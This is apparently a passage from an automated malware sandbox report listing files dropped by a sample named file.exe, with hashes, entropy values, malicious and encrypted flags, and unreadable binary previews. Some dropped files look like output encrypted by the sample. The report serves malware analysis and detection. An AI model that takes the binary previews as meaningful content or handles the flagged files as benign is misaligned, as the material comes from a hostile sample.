          Preview:...*.l....Js..1....<...A.....P.(....:.a.?....mo^(F..~....P2.S.i.5r...7..+.^_.T...;..V...yM....23..(.<*...J.}....^u....c......&.my|...(...?....q....'.u..Yj.,.........7J).&.dI..,....8e.2..<.aQ...i.MRX,...!c..........Hvn.C.5&..x?s^...?..=.NN.UeFR.<q.,x.^..Q...yX..1...8....he.`z..$.x.0...".I\`.e*-..^.f....!S.FYB.1..}R...@......n8$.W^...u.."*.Qq...1......h...<....W_.H&1ji...{..Tq.Lr.%.h.".[~w.C..}..M...?...}cbp...q...#,.h.;.+..-,.ytP...*pm^.%'oN.....D..z...q..#.....[.:.......j.-p.c.x.O?.O..s.) ..Q.\.]...5.X<Y.4.U....5.)Hf...*.!V.....3.......Z...;..q......v...(^.[5k..!-.RLex4.n..D#|aHSK.'.^.d.@.!P..?.....s....k......Zl....e....w......+.$V....h..I.....N>.........6.7@/)\.w}.\..z2+..J.!.{y.bs..:.B2...(...#...Z.yF.cu.z+..%..W...2~.L...........N..;}.._La.S.BOiW...s..}.3..z.._..Ub.@.M...$..P_..=..Y...}@p.....a|..{..*....S..k9..LC...!X.!Q.s\....c@..M..y....+.O...H3..t{..S)..:..Eb.2....o.Lk.3...W*K.v].?lq.jQ.....K........HW|.._.E.....b.sj.H%.F......~....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2097486
          Entropy (8bit):1.0873038127970664
          Encrypted:false
          SSDEEP:3072:YSM+cdTWWYBUxHcr7uk6UgRqEepM6hfzyuiJJL2TlaVJ1nYQJuxFAWEFjaxghax3:YScxYBEHk6Ug0FbN4JL2RuJu7FNEX+
          MD5:660563C994B7963F799CE64B8F41EFB9
          SHA1:9C20E95B593E59AE530B34BD71E4BB0AAA6605FB
          SHA-256:E4C3D4ACFE858F0C046ED41089A9EB929F30D11EF49EDEFB99DAABDB49D52AE8
          SHA-512:3C041620EB1C1AC926BE6CC52BA698F2A8160FAE902966EEE54773BAA284589FD92D13E6F3F3F1355A056E1B581987D69AA558A4A255F1E1076CB631F3DB2980
          Malicious:false
          Preview:...E.@..k..5..K.o^U.w..';l$.....8./.....giX..F.....%....`@....D.j.4...?.e.Z~6..v......?@..%....D...-..- ..RP..ut2-.%.Y....i.$./.5..[@J..n{ ..O...zVm.j$.N.._...6\`^/.N.|dn.vY........{......."<.]6..^...{b.....M(..s............H.g...c........0..V..h6..y...}..W2..RW..;><..qG..Q6.@_.X.!l...;....d...Z..7...U.1t.s.{. .=7.......y..... v...y.G`.t..M.B...W.y..1<.T.}.cy.ym2.n...\f.{.......).4.>.^...z._/.W......$...w.Y.,K..M.L.S..q........{..E.>a...b....k..@.b.@....q...j...,.v..........O.^.h..<.jJ.&e.n...X...R.....A.,.,.$pJ......+...v......Y.....}.o......%..h3..r...Ba..!_B.....+...i..d..F.w.z....P...n..;ZN........6.Ig2^..2........^6..._*})..4g;.....K..?vYB?.N~..V@..>.GS...U.L.u_..B....7_../<.....+B..+....=p;V.8'..........o_...V>.H.0..@Fc5d...D .,........b.1U..!E.g.. .Vx...6..z{........u..../...t...&.......i;h..4.....?.-.ZAJ(..>.y..iB..$.X|.#.%&.._}. .)w1.yC..'.b...0{..F.)N.M...!J.<k..."...._j...n...#..H.^b.Y..0s..8HrMq...~.h....,...[...!.j......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16718
          Entropy (8bit):7.98978884573985
          Encrypted:false
          SSDEEP:384:3/BXTmmoe5bcP9zxcs9jZ/FKGtLcYDa4PWFhqOA7UABJBeq:PBXTl5bW9P/v9dZPNjUELeq
          MD5:B27651941C2BEAA44A076388D4BED732
          SHA1:8658160710E116EA85E9C03A7536011FD14CEBB8
          SHA-256:CCF66812C7B6F4E9301B0892100EBB97BBFBE7A41D8425E89537DC8CFEB6D6CB
          SHA-512:82700E39586D9D8980DAFEB769EA33A4491E1F43A36EA546B05BC8DBCCEA9E0A9C64EC3384D595C1A90B59EF49DA889E29842093A452B4062297DF549624F855
          Malicious:false
          Preview:....Yq.$...W.....4..Dhv..<.>...2....=._...i..T..w.(.....9......6...k.vr...g..R:....DF.}........(........d@"t...D.V..}|..=.J...... u..GYY...U..+i.....I.?ci.DF.......-..:q.; q}.h.wjw...6|..i._.6..L<.,6U..t...Ma..W6.,)...A.4;j..y....1&....h.|........n...(.-Ry..}(......F....dZZ3.0)..6.d}UA....../6s......-f@..@2..n.H......].D.&.v...G.@..W.6..Xc.....`.c..y;M....A.A..b.g.h.s.......8..x ....l.ew.......@v%........K.a.....T....8..z.u..B..9..y.I.|h.W.0..G.w...F..>.....I&j.z.4.F..=.MLZ..i..z...D..jE0..+>...^..\.(......^.j..Je....\...Qb..#..^U>j...o..y.....U.K.N...C.8.O.4%.A.4.Wx.0@+...C%......K9...}..(}.,....D.]..U.#.,...p..kd.f..L.....W..!&...{.u.......S.S.....I....=$6"...b......F*..}}?U.....7...x..C.........y,.,..3.L.X...s.x...K.({.I..N.G0...S..Rc.."...8..WA.0.....8.b.,<:.D......~#.U.........`...4......l.$..z...X!^......vZzM._.Q......k....t.L...M..L...;.e..L.j..d..... ...mL..@....T.........EG...k.'.Y/."X....kZ.... ...+..y......W..`<i...|]...B
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978174962481253
          Encrypted:false
          SSDEEP:96:YNfK6thGh4+O5Z2Y/FtyAI4lrjT4Oqbz99/JJ0AXtPNVUajiru/w/KxaLDLHywbD:Yk6tIVGZ2YttVC99v0ANUlmwrHyhv6
          MD5:22913149051228CE2CEEF9C223B083E1
          SHA1:13E1E20E066A17E6472474685CE2E749604C4329
          SHA-256:2F3EC99D87E7545901EFB578D77AE8804208DE332297BBE3C438BE0EC75AC131
          SHA-512:812FAD6FBFF8248ACAEE1D8D42E11F7E64889A2FD4D1E9E0E373B0F3103C20DD6E19C5323ADD782B8E35260D7622E349FB479DA04F164E6B539AECBC247DE74B
          Malicious:false
          Preview:..a................].....6hS........jH.(at[aX.H.R.M.*...c.*....c.!/.......A..'0J4..BX......).t...FlO0....\.n.....A...Sw.+..K>`s...u. .......B.Q....\5.v}..W.2n..q......hD............k8T..,Y"4.._t.I....OU.6~1.j.4.....}...... .\)....lY....yEA....m:..IgOq........4..J(.7..z....iDf...9.j......_x.XvU$.s.6...h.G"0.?..M!bZ4.`...J`7.j.R.....D..9Uv?.g.....1.~D,.k... G0.....(.-br._....M,^j.h .=.....D457EI-....Q=.H1e.p.i...$L.l...R.2^.\5.#Q.u{|.V>..57..@>d...w.~..^..m*..2...Q..eX1J.v..2.t........p...E_..$..s..2....=3bSp.pD..0.jFt....I.Y.U5.u...n1DZ.....,.......+I?..#..%y.i\..B....~..y..:..z."2.<.O...D...slh.&e.g.T...Z<c....i.4"..d._.n..w.jB<..4...>.h..g........^&.}8z.I.>.|.......d.=.b.=.Fz..U.'..L.;L.....~a....]y.]T..../...y<d..?H.*.2...3....s.$..=..So.0.kqyb.4..I...l......S.....-..5....}...>.........t....6.58.st..4.....g....L6o..-m.j....?.-g... .z..I.9py...#oE.1.3..D8...m.k.(.R.o...l.}p.@z.Ok.C 9.c...?4.r.x.^].....Bna.}S.&..r.!~k...W....&...lI.......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.2467173969884326
          Encrypted:false
          SSDEEP:3072:l90YWFsNHy7yVsUVqZtawBBhFkCapxCDXXICyo3AU2beHbEDWXZMg:leFFsNmisXOwBBMC0wrDyoQlbeHbEIZf
          MD5:33047C1155F4156FCCA0F60C7AC8EBC0
          SHA1:A2D9BCF1FA10D4FE5150D5AD723A2D7AAB464C39
          SHA-256:B99E7825E0AEF0EBF1DF1D49D2FB552C3330CEE127530E42B75A128227757913
          SHA-512:3E642C40EC649945A33B8685013B981E0251F1317EACC003A12794993632156486DDA0A17E7E6F620C4F17EBFF8EEA0F860315B288994BCF0DBC762DA60D7916
          Malicious:false
          Preview:..........5.XP.G>............g^..hf..o........x.B.b......3.p...&....x....x+...@j$...X........;..5...*..G...T....|ssLg.D%..C.N.x..pZ..e...6.M.......R.&..g[k...:z.g...D+....I.}..r.z..v0U].7MBoE2...h..3.J.........u5q....`G..._.0d.hQ..F..;..m0..o4.....4c.r...q_.t..AL.'.D.H.E.8N@.6..0.M..)[..e..l.}........2?M..C(..z3C..E.4K9.+.R,....`....o.L.z.(.??.I...{.'..w.#L,@.......7..k...".7.....>5.....gX...D.M&......H....}.=y.(.&.3.ObN.......U{m.d..D...^........t.U.$......)....V/.l_.W...B.....w..c.(...!.".C..q.....9w..".4n{....L.U.9=.'.!-...}V:.......@hW.*.Rs.....6........Dy~..zY6x=...V.34.?..r....N....FTC2B;.A..;.p.Wq....c.......m.8...]........#...+;..Y..N....Z*.w..x5...V..........}.$........;F..KJ..~.......j......W... .UO.v......+...Y%.y.....j...lw.v..%..*...#?.....f...Yv|..F...m.......N...>B.w.+...FiU....B..+.......y.K.Al``.=.H...^..nF...Rs.1...)..?.;.F#p:,.....q......1vF.'..X.....9..@.6.4y............$.q.x.D._.|.7.'r).U...z..na..O.....8.....A@.E........2D
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.207716638100285
          Encrypted:false
          SSDEEP:3072:ZhcL4+YVr2B44RIv+/HmTHCqML+eDl8L+pP+y/2QX:fodYtM4CHmTiz6eDln2Q
          MD5:D96C80B724168767815AF40D671CD084
          SHA1:FF23D85B58C0F3F399207611FFCC8EF503B83B93
          SHA-256:6E368F44D0A902477811758140DB3D963D59B7023C24C6B71F11FFD08DFDAE37
          SHA-512:7950D20A9D923F6BD7E23A65BB729062FC38F5097D6B670832B37FCFA4D2634D299D1CA95B09F438F903B5AE868099450BE77FCABBEF9DBD1EA176FD09A4829E
          Malicious:false
          Preview:......V@%..<.>..+..>.A3FT}.....d....?.F1.1.Z......r.2.@.q.[:..$...5.'...........[.-.#.........(..w.I....y...r.x`.).....o..O.}.7..O=.=I.....-k.q.=....5D..}.......0.E..J.Q.Y..a?.........../.G.._6...nZ#....g,.[.R..Rh.5...cq...8.#*......DG..$.....c..n...p..s.Qa...p........K. ...{(n..&.....6|.y4N(..+...Bs.........uUZ.(I.#+.s...L...O#...-DWt....D...@z.N\_....F.........N...,......,....%.|.Dl........S.A..r.w...T0.....c..s_].='./..},....n....Q...z9T....Mf....J4.K....*.....R..\..1..z3#...........v...f....e....?.l._.3.u.Pm.J;P...6......U...W.by..L..<H"*.......j.wU0.W...M....!..D..O...U.q.........;tO../..P.v9.......1....O..~lQ....G..q.|..A......2.(6...#..>?.aE ..nd_w&...X.d3.HN0mf&.u..C..m....8D..?....`E*+..G8I.Z..!...u.V.....uq....(.!_............Z.$9.....x.=i..Ud..-p.y./..,..up=...A.....^.e...h....S.F..&.K".F.R%S..]......s.~......R...!..!..A6!....f..wZ_..p..;.5......^|d~..x....,..y..R....r.+...U.....w...\...>.d..$....#...Z..TA....#...bu..~9.e......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.2082352837986647
          Encrypted:false
          SSDEEP:3072:H9h8qFCTMk+qgLUVFHjcx7Llye3hmx5TmRqVqFb28PA0oieTEDUY5:dXFCTTHQQeEds64AJZE4o
          MD5:120148B2F1382688E0A2FE11C70CE472
          SHA1:75B455DB52E4170E4C7A0ECD07E591B1DE849E17
          SHA-256:257F9F16010875677ED731B8BA5A0D89CA0C9C2CBF4BBC9FC871E8AA50CE43DB
          SHA-512:FED4C11CAC9FC660CB697E08D71313A7E5C870EDC0AA2DF926B79EEAF04453F79097A083C39233E26BF4D7B4598977ADE51101F8FC17BBA3CC4E5A51D4C79375
          Malicious:false
          Preview:......Q....w...'D..d{.z.u..\p.>...../..,.+..rM..S..'.lL.........{...Q.B.b.?..OSu.....E...).Z.....*aF..a....U>....8+..j.M.OP&|...y\&..*.#u..Ss.I../*../.v...4.k.C..S./z..]..dX........(...@..t....-.t..Q9.65l|J..|....k..7v..y......=n7.X.M.....9.l./.k..!.s6.f2U.."/@).=.A..S._z.......4...M..<....of....\*J.q.w..Q..e.RIlV....4..d.........15.q...X.).T..........<.i..O.f.P...g..9.<.j...#.-......`..D!#E..U.-.k.*.......-.S..]^.Su}..GV...~......s..=C.'.|.g.....rO...G.l.b.O.....>.?.....D/9.....^.F.0.Q.Yxk*mI(6.S../..kk...e<vw......#kh..o?rs.S...u..d..,..v.;................L=I.&...!N.v.`+M....!..06.1.Y..5"9=....},.X|B..E';Ns.C.'.~.k..)..4..v.....,/..gp...lJ.....;.z.y.P>.}.......q..O.....Ig}.xJm...........9...!.A$....).^....35Z9OV.*.........4...(v...k..Ow.......m...|R7d._..Y.pV.,.+W...@.%.^....].bB<>.()..~_.,.?..H..G.l...7.0 "...=..X6_n...g#.AZ..Sr...5.u.C.`......jV.<...:...m...k.R...V4=..0..Eu...;q....z6N..?$..S..M........l..d...^.w........$.mL*.:
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):524622
          Entropy (8bit):3.208001435956985
          Encrypted:false
          SSDEEP:3072:UFC3GcnFoUJqlnWTTwiylgtkGwgdw1HV8j/tUq4nip6B+:4uclnWYiylwphw1aRUq4nit
          MD5:DDF9E47E9798A95A09486ABBC290D33B
          SHA1:21B29415B7CAF3DC8BD2D5E5545B2FE601B152CA
          SHA-256:7A741AB9BB1B6E7DDD8F7FC278F516505A250730883A844E7FDB36283BE3BD6D
          SHA-512:BD766FEF10E2BD969BBE75417EF462FBAB14F1781C63BCBF35166B8E65396D6C22F0CF581E561E5D1FD84BC72CEE42F159B6F3EACA49D6ACCE8B2A2F153E2DD7
          Malicious:false
          Preview:.....M.o....~.)....}....u, `..IU..^.J..Xu:.dTSV.*......#.t'.B......$=...A..#.%..|....b..S.>e.@.#..&....i:..N..$EK0.=c;.]..[..S.......j..c..^=.5.Y]4H..V{g..Cn~g"zY.o.`iEO....3r+......L\G....>^.I...W. .s.h8."..(M....JrC^Uv-5..p.\\..O.sj..f.$.....i.f3.04..!SF......9....H.....<9.'h.RlS....2..F.a....q...IE....h....t.T...U.8X]..&.."f.......l..p$.......wu.1)&...[..-=..m.P...#..R.n......I..[._/.{....0.t...............W/...B.d......s|X.r.......!I....p...\...yj.Y.E.J.'....q.B..Y&.w./. ...,..aN.....w.:k.1...u...G..I.....U..r..~n....Eg.?.n..v..PRhZ...pka.iO..v.`.+._v.jL.l(...$#8.>U.Z.#.:..`.K.....c.X....S....Y.|......].....0.(3E.o...bp..[...._...8.!."&.0....L....Y..DY..[..m...[..sy....E.#..S.*.er....7.j.|.|.o.<.5.T....W....y@./.......)0.b..|-.+...r5.Q|a>E....hP3...[(..-<..Y.......R.}q+A. ..a..~.......dG...I.[!mGx.-q..-,.'.0,..*....IIr...t...Q/..h...3%.\..../ ...R....-..y....#J....1....K...]}K..}lt..\....VO...c..0.Q..3.\/.....U........$l>.....W
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1482186
          Entropy (8bit):5.657821243101399
          Encrypted:false
          SSDEEP:24576:98Pjt6az+F3jv8COuZ/kr2bEEYz1jBa/mqkNRM3lVKSuc:+CF8hR3z1rM3lVKSuc
          MD5:1EFED910073FCDF048AA76A7145D2E5F
          SHA1:AA863ED37366770BAF5E82176796EB109D7CC849
          SHA-256:B94F2FF2F45D38D2D0CFCE9034664A249C2356D13D8167B5B4B290FEED55E9B0
          SHA-512:F10B03B85B7C4EDEEF34633AA54AC53EED8CFC3F4E05A5AB1A913B909F3D3D21C19D375D8F5BACFF54842C3B0C4304FFD74DAE35CF06F58B58249B3D9C3A7BA8
          Malicious:false
          Preview:Ej..D....2.v7u..y.uJ.. ............D.e..h...*_.d...@.\-.....u....._...(....=d.2...a..dX.I.d..2r.W.<...P..4*-+..M.G.2^...A.....E.=V|....G.....d{YGz.;.:...(!R.......E=...k.%.r...sN...........e...H...0..........b.h.X).T.5..k....oH..b..M..l).G....:..<g..q:.s#.Q..f.@.P'..%.. ;*W^....?k.G.Q...|n.tNkv..."p...E..-.@.......j|Wp..6k.0...d....Dy.gp.`^V`.hv...m...[Z..O....7....T.O2^q.P.(...).n..E....H.k...?)..q...p...7......k!.R..#|.:.h.j.V.....p&- ./...Ov..u..L}...k.......".G.q..s.D..S.F..o.%{.;0F.%..pk.P.4-..EX.v.0.p({......2.....h.,.......u.-T..,.e.E......~..-..F.$R.a.. o....\UM.H.%#.1.#5..Q..7....w@..x.rl..ez./p..h...Tq...E...y,0......,...mu.xYr......>Yep....X.../......!..<_\....%.K...w0AN...>..I.H. Z%;..#...6..Ni...`.^....,...x_........_.vo<...G..e.i.......k.6nx...iY..........y$\.. ....=.g|.]EP.....@..v.....-W.vy...(.\.....v.....n.n.{.O~D.B...YmA...!.....X....V}O......fBXF...........LA{&^N\....s..BI....4R......$e.....).Z.....+a.g<......w.H.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):217852
          Entropy (8bit):7.587851502655338
          Encrypted:false
          SSDEEP:6144:CQ0DDHRap+euJCCz8TaivfgZFUjCxc81Cdb:CQ0Rap+euEC8Taiwa
          MD5:DE9A939BCAD4A0690E23AA06EB80A907
          SHA1:C67609295E471854EF0EDBA84627FB248ABAEF1C
          SHA-256:D8DE7DEDDCF518789F9775E4AADC7D02A6CE61DA0A1A595ACE63B738CCF9EC62
          SHA-512:BFBBDD78A925750FEAB2CD0D64F103AC6367314565D128A2246424B1D3A0E5358BFC7602E4796B51517A0F62B91B8505F93F471F13447E7C79487BC0179C02C7
          Malicious:true
          Preview:0.0...R@.d...Y............:......D.Y....}.<a....X.7.w.l.....wg.#$.....WQ.i.55....>/.......xR....M.....9=..lQ.;s.3.7.p#]..J.....%..... C......;~..C.3.[f..V..F.T..J....k.-..$K.Tr..'.D...v.".8..`...+.kO..e[......YU..e.Ec.Ca.....@.X?|.H...Uu.i<...&6..a...i^......WB.W.....,.}9..d.8f.&..s.Ag.t.C.*..#......r......i...P.t..-.g`U.0..1B.....p...BZJ.v.8f.8g..3...]9/k..+..A.nTta.i.....(...eQ..E.....{.(.-..h.....#....?.f..v.(........I.R/.p.`.tq~....v$.....;...5.K.t...epi..n...yH3.U.H.y.`.\......_u..>"|.z...v.!..]w.=b.*...EB..}...ij._.`...L6w,..h],.>..0.Dc.X..v..d..0]..0........O(.S..j#EW.F0H..c.^.]l.s.#Q .T......$.d....u=.....\...g.;..3n...#>M.,............k.p5a.........f.....d.=....w%..:.J..X!...'[.*0.s.A...eK4.nPd.7:]...}.....[...I!t.......Ez.T.$...#_..........|c[I...C.K..H..+...$`../o{.!.y/..J.P./..O........d......Q...3..B7.U?21.D'.<...j.-..c..?.(V.c.jP1v...B...ua`D.C....;.j.D..B........P<.dQ....6R._\d..)m.&V.4...l...`.h...V]R..0]n<......>J.Sg..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):239538
          Entropy (8bit):7.349458189235347
          Encrypted:false
          SSDEEP:3072:s1lnDbzIJmXUw/b2fDAOfov1L/lCUCAYzoNTqQE7ZA5u1r7zWAB2kGqUcC9ECNEA:s7Db8XDAoA3CUuzowQIA8ZpB2kGqrCNN
          MD5:1D851AC49FCD39354A5331497F515CB6
          SHA1:60A699324E9D22C9D74CBBA07DF7E23D0738743B
          SHA-256:AF39BE0549651373DFA30869AB7E7D9E8DF7C11DA7360D0FDE4074D99BA8C758
          SHA-512:9ECEF91178BC0941432F78D9A9FC6478D8995AEE12A38E5BD5DCD228FFAED844F9ECDDBEFBDCAD596AA3AE84058A3AC2C3D477F93B4D761443954D344D7D4787
          Malicious:false
          Preview:......{..&.Rm>>...P..x>J.[3..v?<..T$$..v.).=....^..R.XD...[......(}...E....0.F..t....G8K..._T,kV.{..|Z......5.m@...J..^x.R.n%..F.s;......]H.C....j...w....C;t...,..c7..[.....0...".H......fs..x`E.......K.'e..R>....5..?vG...q.;.u...|i.}..c..B.4.3....(F....aG.6T4.f|..T...7.....z....X...p..../.Bw.A..!`.R.g.4`...G.zuQy...7.W.wo.sm..<G.3....8.vLm.GI....csx...X..To..o......vZ.j.......}H."m.@*...j..}.X.(.....]..`...j-..0e7.....{3.0..........>....iv.C.X.K...qm.i.?'.........G......J..2HB...=.vt.b..V.....f%...).......B......d.b....5.I....xc....o...[..}J....z..p/..t.-....=`..vQ.......A.O+).Z..[y..P.....8aQ.y_.}~......c.H..i.......Ew....v..G....o..fV..1.3Bm..!..l...eq..n...._,E..R.W:n.5..z.......j.8...}..v.i.I.Q..w...m....5..:..L.[....e...W.n>\..H...j~{S../.|.W}.bH._.'(6.N.R(.K.....-lt....^l..@.D......d.....f<..(..?[..d.V:..jC.1...x..>..52..t$.-0."t.*"...Z.n........,>..W..=U.....l...^.7...Hh.v...2....F....elRm.$a..=..[.`.>.x.u.T:...kB.~.%... .c..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1482186
          Entropy (8bit):5.658995222351111
          Encrypted:false
          SSDEEP:24576:0WoPVcEYac2jt6az+F3jv8COuZ/kr2bEEYz1jBa/mqkNRM3lVKSup:iPVc4dCF8hR3z1rM3lVKSup
          MD5:565350E3B298ADA8C4E88FFF436CBF8B
          SHA1:05A68B3AB0A71D2124C3E420F57AA600BCAD4F05
          SHA-256:F3CFBB7CB2CB06FD331F7F22C5A17770A606A18F3F455F6FEC435DDE2A865AFA
          SHA-512:5FF07099185794FFFF0E64006F8905F14563D8AB59EBE5D50866AD5A57FE5EF2E6C2FB6B59BC79F962F02D91D8829AEDE31AE4E3E7AAC4F85C139E56F325A017
          Malicious:false
          Preview:Ej..D[)..B.#@ .w*.R8..Ea.D.n'.3.-...%.....>#..p.+..E..am.>...<.5..T......7...j.|.N..G.....E......p%_=....p%P..z.g....b..1%h.....>..c5.e}3..f.e\....J.F.J.l*w.^C.*!.T.h...9...o.W.."?..o......b.~8....%.6...b...&.3&.B......h~..M\.-@..1..?.;XV0..U..S.C-.v...,....W...\..nN..E.......[Q..5g.(f.I..-Iq......+..C......f+,...$......w&M.....(L[.....v....+.q.X.....;.h......P....K.([..Z......Y........~......f....0.*..M!...{..s.".F"...{.tiGM.?u.....9.h.....E........5.0......F.).'.w.+..::+....s.B=..E...@.?,...tK..>..x./.d.".6..F...0...{..I.EI.Y.aQ#,`.6];...F].....j..d......]....J*......z<..r5JY..C..R}...@y.O...\......l....(......m.P$X.K..5.?.....p.\..n..1.H...i.E.....@n.7..x..T-...8R....m.l..+..n.....^.d..<.Q.B....i?x....d...>..<.[p...l....&..9.....F*.x..-r.E...(C.~. }....B...|O.W..}....*`.".:.....!..g.l.d.F.q...3.VY....l.lN..rn..b..al..\.4..S.}_.J....D...qqh.i.@(..r.\.....0.J....7)..u.......o,........PS.H..m....Q`Y..y.'.Z)...k.....,..2D..@......4.}.G&?.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):102814
          Entropy (8bit):7.9979689027750265
          Encrypted:true
          SSDEEP:1536:GhUcAp1++FY3tF/V4tBGdBr4zCdf9/2482yWy9MtgXILAqg2DpFXywlMHYt:Ghzi++FuYtCBrDl9/248ZWyzGDll7t
          MD5:3D977529A743490B52D3CB9E26D7D867
          SHA1:BCCB7B9843F21BFA124CCF90472823EC44D050C2
          SHA-256:69605F3A54F6362E3C5ACBB966AAD88805D0D1897DCF2CCD35D564288370F639
          SHA-512:ED887C4DA1FF7F1BA1817D6FEA46727A88633D1B8F2C83B8EC67AA7426886521127C5711EEA362D80999CC2B3864951A5F48388C392C3A0CBED89EC0706E72D7
          Malicious:true
          Preview:[{"Sy.......n...14b.s.P.7)..!)......G....y0x.v......[e..b6...?"<.Y.;....)......j.-.+...|3.ys.P.h.A(.........Y<>.....]....Z1....Tw.+x].{`*j2O..J.eS.g.........N6.......A..hd..-.k...@.. ....9p.....wx............y.x..R........w4..)e....Z....t._....T.h......+.-"..%|\1...u.%b..+..[[..........s8..w...XX....)UD.?.W5.8.\C......n..O7+'.g.T.U."......F.<...Q..A..*w..V.....J...._.1...z/.3d,.XR...........z...j....o....XX2U.g....LP[..B...&.6....L./.OZvj.{$...*y]........G..I....].#.~....f.8..G..........l.3..YE...G......2...xPj..?.JmZ..j...t,..v..B.".zX-.\.d>!..h.]L..[..l...7.k24jp...o.....".y._ Zg)T.?L.W2......|kx5.Q.m.d.P6&.1......].#L.l....c..e...(.B..Ww..........&.....&.`...&..+wR...s..p.OE".9I.+..-..-c.....z.oy7F.pV.M.}...@$...} ......&...p...X...f2..5...`.Xa...X.......=4..}..v..(.n.\LFp."..:.c......!*..~.b.}..W.3.*...6.<.....B.LY'.c.;x.l.i.c...>...^.3..,..|.........p...)s....`......kgt.SQ.s..D[.7.|\.>Yh(3...)}ta...02.W.J .B.....tg..y2s...T
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):104142
          Entropy (8bit):7.998270379285089
          Encrypted:true
          SSDEEP:3072:BhcPdvRU/U8YWuC/8QKk3Zf2PiqUIZWgmXOfOQ5it/kz0:BhcPdSk2KWRyiMZbmXcRm/kg
          MD5:D1BD2F1DA5BFC900A386F14288DA0DB2
          SHA1:A85431180D7C8055410CA1AC1FF1C1E7CB22CFA2
          SHA-256:00601BCC7213877F50C7CD76F684ACF481474D3F19BEF93C470AE07CD6B3CF88
          SHA-512:30928FD9750CDC639DDD56C137FB003104175CE2A4D2111913204B952B6AFCADC3F58648107CDD10C48637F8ABCFC6DE347633ABAF0D5E9C556A11A995C173CE
          Malicious:true
          Preview:[{"Sy.|.H..>...E...v.aI637.q{7n``...N.B.>0......$.g.^...k5........o.`E.q.).nq.})x<...cN...B.YcO<.@..@..t.[bP...".H.tv.HE..o...D?.e.j..E8b..d.A[.......6.l..;..R...rp.yd....F.7."..s.......i........u..@....:...#}7...<m.W"N.tI......cfK.6..}...(O. ...-.A..UW..v..H...0Ci79.e}w..n.9...|.J.I...>......N...............IN@.K.-..E.~..d...r..8.b..+d~`.J......M.. .....l..]U.Mcz-.D...q.U....Li..6S...Y$....Ml..4....%".._*4......eG.fC..e. ..h.p.....X.H<.........,....[SP..N....^..y.(..h.)......D...+..7/Q.....G..g;...#9.S.#_v...d.rI....5.esM.UE....k.&.^..t!M.Q....f.D.._.{...7Yt.qE.S..`....A....b.....Q....}...?.z..=...ri..z.R...[....!Ij..u.@..._.v...A.J...c{s. .../...}k...L..JH...Z.#..{...8A.C.o1..BD..f,.3#5c.feU...O.1r...P'....7h..Hd..~O9."...G7=..F..........c.#.......c:....T@.*....T...'w.........6..]/.-...CE... l..nI.f....M..DRVr47lH......4. n.....<...# Rs....R.P.A.x....{..).+.^.3..+8..BB.L..Q....T...Ig...v..r6.......R.T.A.......P.(.:..z7s[..BY.!"..d..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):104142
          Entropy (8bit):7.998412938061311
          Encrypted:true
          SSDEEP:1536:eYXp2W63ahW2hnMk4litw2chv07LTp2DEgmC5HkUZOQ18TxBSAdAQaR2:zXp2Wyg9p8iZqKHprhC5BZOBqA2R2
          MD5:8D0E90628216A3CE14E465A5358204E3
          SHA1:CB1E4735C0A91609EEFF91C63B05AE6A80713493
          SHA-256:CDB1B827DBB164793946071E8460BE9AD9068A36EEB0FA7A5E70FB3F073CC08E
          SHA-512:5907023D2EDB10C8C5B7C43AAB9E62831C762D80A2D9FC48D533CA454D198A95A4D89F9B2F914F67F321BE472196C74A23C8880F0BBF323E59F59D38362B5DF7
          Malicious:true
          Preview:[{"Sy....m....Y.gM.y.d.5I.....YK...R.t...`.H...0q..vfz.t..O$8.NS.lhL...M.`...g...0n.l..K.....'.pyqfud....rv5.......H@D.\a.^....r.)...c.r..i.lT..}..,.8^.2.0[d...<|.....p......(.S..<... .2.].J4.....8..z...7..8.........#..[.D..l..L.y...B........... ...'+..m...\.{.J..5V.^.BS... N.v..A....O}]X..[......^.P..pMd!.V.d....]l_.X<_......e8s....Y..iiG/hi.5.8.2..C[.......O..GjB`..+..9....{....Y#...Nc..2.._../j..2.jTB...t...^i>....e..B.O.v....og.....QBH.g..C@R!..1..(B...._8>-..az.X...`..1.ri..\^.|b-..kP...tiY.E.SN.. .f...5...\......srI.@.kA..u.|..L~0.K.AQ.fI.q.%(y.]qX3vi7.c.XVB|0.e...'..B...T.V...}...D\.mw.<ao.q.}.....Vpnf........R.....w.......D..8d.n.......:l.v....._S.Tt.....a.. f0..A.u#./B.8B$!.g/.......j.!...p.4c^.@.gO.....).=.h.1....a..D..2.I.V..1._6 s..d/.Y....8y..G..T}>(..j+..{[..........W.k.F3n....Vc9....%....8r\....9Q._'....~#..,u3.U...Gw}G...Ek&.[5.\..y.4N..9{....+q.t`."..h.W&{].<...U{.3N.M.F@_......!?a.v~.s]...]..".5Xj.....L=1..;.....wK).gm.zl.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):105085
          Entropy (8bit):7.998268830446769
          Encrypted:true
          SSDEEP:3072:EciTj87bd5jz9PcYvWTIlmkFXe3iBvjB5:E5f8fdB9vvWTqH5hBvr
          MD5:15D1A484D204437A169151DAC71E60B1
          SHA1:BCB496A22C74CBC951CB0B4099304BC41D25FFB9
          SHA-256:AE09DBA360BC2E44F2C2BD7E907A01A2B4C526AF386F4DCC888D91D3ED475D91
